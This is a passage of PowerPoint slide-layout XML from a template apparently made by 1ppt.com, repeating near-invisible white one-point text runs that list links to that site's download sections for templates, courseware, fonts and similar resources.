              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout57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57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57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57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58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58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58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58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58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58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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout58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58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58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58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59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59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59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59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59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59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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout59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59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59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59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60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60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60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60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60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60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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
